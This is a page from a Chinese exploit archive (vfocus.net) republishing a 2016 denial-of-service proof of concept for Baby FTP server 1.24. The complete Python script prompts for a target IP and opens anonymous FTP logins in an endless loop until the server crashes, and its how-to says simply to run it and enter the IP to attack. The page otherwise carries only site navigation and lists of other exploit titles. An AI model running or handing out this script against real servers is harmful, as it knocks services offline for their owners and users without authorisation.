首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Baby FTP server 1.24 - Denial of Service
来源:vfocus.net 作者:n30m1nd 发布时间:2016-10-28  
#!/usr/bin/python
 
### Baby FTP 1.24 - Denial of Service by n30m1nd ###
 
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Run this python script and write the IP to attack.
 
# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time
 
# Exploit code
# ============
 
import socket
 
ip = raw_input("[+] IP to attack: ")
 
sarr = []
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip,21)))
        print "[+] Connection %d" % i
        crash1 = "A"*500
 
        sarr[i].send("USER anonymous\r\n" )
        sarr[i].recv(4096)
 
        sarr[i].send("PASS n30m1nd\r\n" )
        sarr[i].recv(4096)
        i+=1
    except socket.error:
        print "[*] Server crashed!!"
        raw_input()
        break
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CherryTree 0.36.9 - Memory Cor
·PDF Complete Office Edition 4.
·uSQLite 1.0.0 - Denial Of Serv
·NO-IP DUC v4.1.1 Unquoted Serv
·GNU GTypist 2.9.5-2 - Local Bu
·Bassmaster Batch Arbitrary Jav
·Komfy Switch with Camera DKZ-2
·Angelo Emlak Scripti 1.0 Datab
·SmallFTPd 1.0.3 - 'mkd' Comman
·ASP Gateway 1.0.0 Database Dis
·WSearch service (windows) - pe
·freeFTPd 1.0.8 - 'mkd' Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved